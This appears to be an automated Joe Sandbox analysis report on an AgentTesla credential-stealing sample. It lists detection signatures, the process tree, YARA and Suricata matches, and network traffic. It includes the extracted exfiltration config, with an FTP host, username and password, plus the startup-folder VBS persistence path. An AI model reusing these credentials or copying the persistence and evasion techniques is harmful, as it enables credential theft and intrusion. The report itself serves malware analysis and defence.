Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
O65887cvz7.exe

Overview

General Information

Sample name:O65887cvz7.exe
renamed because original name is a hash value
Original sample name:f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94.exe
Analysis ID:1549420
MD5:7059c9fae0e7595bf454796551c79dab
SHA1:ef9d22e79dd8f6482c1e1b6c285555b23026575e
SHA256:f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • O65887cvz7.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\O65887cvz7.exe" MD5: 7059C9FAE0E7595BF454796551C79DAB)
    • InstallUtil.exe (PID: 4324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 1984 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnerException.exe (PID: 5080 cmdline: "C:\Users\user\AppData\Roaming\InnerException.exe" MD5: 7059C9FAE0E7595BF454796551C79DAB)
      • InstallUtil.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 31 entries
              SourceRuleDescriptionAuthorStrings
              0.2.O65887cvz7.exe.5680000.13.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                4.2.InnerException.exe.3da3db0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  4.2.InnerException.exe.3da3db0.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.2.InnerException.exe.3da3db0.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    4.2.InnerException.exe.3da3db0.3.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x2e67c:$s2: GetPrivateProfileString
                    • 0x2dd9d:$s3: get_OSFullName
                    • 0x2f38e:$s5: remove_Key
                    • 0x2f56c:$s5: remove_Key
                    • 0x3047a:$s6: FtpWebRequest
                    • 0x31243:$s7: logins
                    • 0x317b5:$s7: logins
                    • 0x344ba:$s7: logins
                    • 0x34578:$s7: logins
                    • 0x35e7e:$s7: logins
                    • 0x3511c:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 21 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" , ProcessId: 1984, ProcessName: wscript.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs" , ProcessId: 1984, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\O65887cvz7.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-05T16:15:03.349715+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549707TCP
                    2024-11-05T16:15:41.776869+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549873TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-05T16:14:49.414192+010020299271A Network Trojan was detected192.168.2.5497045.2.84.23621TCP
                    2024-11-05T16:15:02.464005+010020299271A Network Trojan was detected192.168.2.5497065.2.84.23621TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-05T16:14:50.253913+010028555421A Network Trojan was detected192.168.2.5497055.2.84.23658644TCP
                    2024-11-05T16:14:50.259852+010028555421A Network Trojan was detected192.168.2.5497055.2.84.23658644TCP
                    2024-11-05T16:15:03.287183+010028555421A Network Trojan was detected192.168.2.5497095.2.84.23659913TCP
                    2024-11-05T16:15:03.294837+010028555421A Network Trojan was detected192.168.2.5497095.2.84.23659913TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: O65887cvz7.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeAvira: detection malicious, Label: TR/AD.GenSteal.dkodx
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeReversingLabs: Detection: 75%
                    Source: O65887cvz7.exeReversingLabs: Detection: 75%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeJoe Sandbox ML: detected
                    Source: O65887cvz7.exeJoe Sandbox ML: detected
                    Source: O65887cvz7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: O65887cvz7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D01000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D01000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49705 -> 5.2.84.236:58644
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49704 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49706 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49709 -> 5.2.84.236:59913
                    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 5.2.84.236:58644
                    Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                    Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49707
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49873
                    Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.5:49704 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: InstallUtil.exe, 00000002.00000002.2179804969.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.000000000260C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, SKTzxzsJw.cs.Net Code: RePIUNFdBeM

                    System Summary

                    barindex
                    Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_02A92E180_2_02A92E18
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_02A9CF4F0_2_02A9CF4F
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_02A9CF580_2_02A9CF58
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_02A9D8C80_2_02A9D8C8
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_02A9D8D80_2_02A9D8D8
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_060AE6780_2_060AE678
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_0609001E0_2_0609001E
                    Source: C:\Users\user\Desktop\O65887cvz7.exeCode function: 0_2_060900400_2_06090040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_030593F82_2_030593F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_03054A602_2_03054A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0305CF282_2_0305CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_03053E482_2_03053E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_03059C702_2_03059C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_030541902_2_03054190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_03059C682_2_03059C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065F00402_2_065F0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065FDC082_2_065FDC08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065FBCC82_2_065FBCC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065F8B682_2_065F8B68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065F4FD02_2_065F4FD0
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_00ED10384_2_00ED1038
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_00ED3AC14_2_00ED3AC1
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_00ED2E184_2_00ED2E18
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_00EDCF494_2_00EDCF49
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_00EDCF584_2_00EDCF58
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_00EDD8C84_2_00EDD8C8
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_00EDD8D84_2_00EDD8D8
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_061CE6784_2_061CE678
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_061B00264_2_061B0026
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeCode function: 4_2_061B00404_2_061B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00C093F85_2_00C093F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00C04A605_2_00C04A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00C09C705_2_00C09C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00C03E485_2_00C03E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00C0CF285_2_00C0CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00C041905_2_00C04190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A956A85_2_05A956A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A900405_2_05A90040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A9BCC05_2_05A9BCC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A9DC005_2_05A9DC00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A93F205_2_05A93F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A92EE85_2_05A92EE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A98B605_2_05A98B60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A936305_2_05A93630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05A94FC85_2_05A94FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00C09C685_2_00C09C68
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs O65887cvz7.exe
